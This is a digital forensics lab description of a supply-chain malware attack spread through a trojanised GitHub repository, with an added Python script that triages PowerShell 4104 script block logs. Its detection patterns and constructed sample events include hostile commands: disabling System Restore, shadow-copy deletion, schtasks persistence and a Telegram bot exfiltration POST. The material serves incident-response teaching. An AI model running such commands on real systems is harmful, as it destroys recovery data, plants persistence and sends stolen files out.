The RepoReaper Lab investigates a sophisticated supply chain attack targeting software developers through a weaponized open-source repository. The attack was first detected when a development team member downloaded what appeared to be a legitimate script-to-scene conversion tool from GitHub and, by building and running it, unknowingly set off a multi-stage malware campaign. Within minutes of compilation, the malicious payload established persistence on the system, escalated privileges through a UAC bypass technique, and deployed encrypted components that operated entirely in memory. The attack demonstrated advanced evasion capabilities, including disabling Windows System Restore, masquerading as legitimate applications, and leveraging trusted system binaries to avoid detection by security tools.
In this lab, digital forensics techniques will be applied to reconstruct the complete attack timeline, from initial access through command and control communication. Using artifacts from web browsers, Windows event logs, registry hives, and NTFS filesystem metadata, the investigation will uncover each stage of the attack chain. Students will analyze PowerShell script block and module logging (Event IDs 4104 and 4103 in the Microsoft-Windows-PowerShell/Operational log) to identify malicious payloads, parse the NTFS Master File Table ($MFT) to reconstruct file creation and modification activity, examine scheduled tasks for persistence mechanisms, and investigate the process hollowing technique used for in-memory malware execution. The walkthrough will demonstrate how attackers abuse Electron applications as delivery mechanisms, exploit Living-Off-The-Land Binaries (LOLBins) for privilege escalation, and leverage a legitimate communication platform, Telegram, for covert data exfiltration. Through this comprehensive analysis, the lab highlights the importance of multi-artifact correlation in incident response and the critical need for monitoring supply chain risks in mode
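As an added example that is not part of the lab or its tooling, the following Python script shows the first analysis step the lab describes: triaging PowerShell script block log records (Event ID 4104). Windows splits a long script across several 4104 events that share a ScriptBlockId, so the script reassembles them in MessageNumber order before matching, and it decodes base64 blobs so indicators hidden behind -EncodedCommand are still seen. The XML records, host name, timestamps, script block contents and indicator patterns are all constructed for illustration and are not artifacts or signatures from the lab.

```python
import base64
import re
import xml.etree.ElementTree as ET
from collections import defaultdict
from xml.sax.saxutils import escape

EVT_NS = "{http://schemas.microsoft.com/win/2004/08/events/event}"

# Generic PowerShell tradecraft grouped by the attack stage it points at.
# These are illustrative patterns, not signatures taken from the lab.
RULES = {
    "encoded_command": re.compile(r"-(?:e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", re.I),
    "base64_decode": re.compile(r"FromBase64String", re.I),
    "system_restore_disabled": re.compile(r"Disable-ComputerRestore|vssadmin\s+delete\s+shadows", re.I),
    "scheduled_task_persistence": re.compile(r"Register-ScheduledTask|schtasks(?:\.exe)?\s+/create", re.I),
    "telegram_c2": re.compile(r"api\.telegram\.org/bot", re.I),
    "in_memory_execution": re.compile(
        r"\[System\.Reflection\.Assembly\]::Load|VirtualAllocEx|WriteProcessMemory|CREATE_SUSPENDED", re.I),
}


def decode_embedded_base64(text):
    """Return decoded views of any long base64 blob in text (UTF-16LE is what
    -EncodedCommand uses; UTF-8 covers FromBase64String payloads)."""
    views = []
    for blob in re.findall(r"[A-Za-z0-9+/]{40,}={0,2}", text):
        try:
            raw = base64.b64decode(blob, validate=True)
        except ValueError:
            continue
        for enc in ("utf-16-le", "utf-8"):
            try:
                views.append(raw.decode(enc))
            except UnicodeDecodeError:
                pass
    return views


def reassemble_script_blocks(xml_text):
    """Group 4104 chunks by ScriptBlockId and join them in MessageNumber order."""
    blocks = defaultdict(list)
    for ev in ET.fromstring(xml_text).iter(EVT_NS + "Event"):
        system = ev.find(EVT_NS + "System")
        if system.findtext(EVT_NS + "EventID") != "4104":
            continue
        ts = system.find(EVT_NS + "TimeCreated").get("SystemTime")
        data = {d.get("Name"): (d.text or "") for d in ev.iter(EVT_NS + "Data")}
        blocks[data["ScriptBlockId"]].append(
            (int(data.get("MessageNumber", "1")), ts, data["ScriptBlockText"], data.get("Path", "")))
    out = {}
    for sbid, chunks in blocks.items():
        chunks.sort()
        out[sbid] = {"first_seen": chunks[0][1], "path": chunks[0][3],
                     "text": "".join(c[2] for c in chunks)}
    return out


def triage(xml_text):
    """Return flagged script blocks, oldest first, with the indicator names that hit."""
    findings = []
    for sbid, blk in reassemble_script_blocks(xml_text).items():
        views = [blk["text"]] + decode_embedded_base64(blk["text"])
        hits = sorted({name for name, rx in RULES.items() for v in views if rx.search(v)})
        if hits:
            findings.append({"script_block_id": sbid, "first_seen": blk["first_seen"],
                             "path": blk["path"], "indicators": hits})
    findings.sort(key=lambda f: f["first_seen"])
    return findings


# --- Constructed sample data (not from the lab) in the shape of a wevtutil XML export ---
def _event(sbid, n, ts, text):
    return (f'<Event xmlns="{EVT_NS[1:-1]}"><System><EventID>4104</EventID>'
            f'<TimeCreated SystemTime="{ts}"/><Computer>DEV-WS01</Computer></System>'
            f'<EventData><Data Name="MessageNumber">{n}</Data><Data Name="ScriptBlockId">{sbid}</Data>'
            f'<Data Name="ScriptBlockText">{escape(text)}</Data><Data Name="Path"></Data></EventData></Event>')


# Encoded-command payload built here so the sample stays readable; it is invented.
ENC = base64.b64encode("Disable-ComputerRestore -Drive 'C:\\'".encode("utf-16-le")).decode()
SAMPLE_XML = "<Events>" + "".join([
    _event("blk-3", 1, "2024-05-01T10:00:00Z", "Get-ChildItem -Recurse -Filter *.fountain | Measure-Object"),
    _event("blk-2", 1, "2024-05-01T10:00:03Z", "powershell.exe -nop -w hidden -enc " + ENC),
    _event("blk-4", 1, "2024-05-01T10:00:05Z", 'schtasks /create /sc onlogon /tn Updater /tr "$env:APPDATA\\updater.exe"'),
    _event("blk-1", 1, "2024-05-01T10:00:07Z", "$u = 'https://api.telegram.org/"),
    _event("blk-1", 2, "2024-05-01T10:00:08Z", "bot' + $token + '/sendDocument'; Invoke-RestMethod $u -Method Post"),
]) + "</Events>"

if __name__ == "__main__":
    for f in triage(SAMPLE_XML):
        print(f["first_seen"], f["script_block_id"], ", ".join(f["indicators"]))
```

The Telegram indicator in the sample only matches after the two chunks of blk-1 are joined, which is why reassembly comes before matching; the benign blk-3 produces no finding. On a real case the XML would come from an export of the Microsoft-Windows-PowerShell/Operational log rather than the constructed records above.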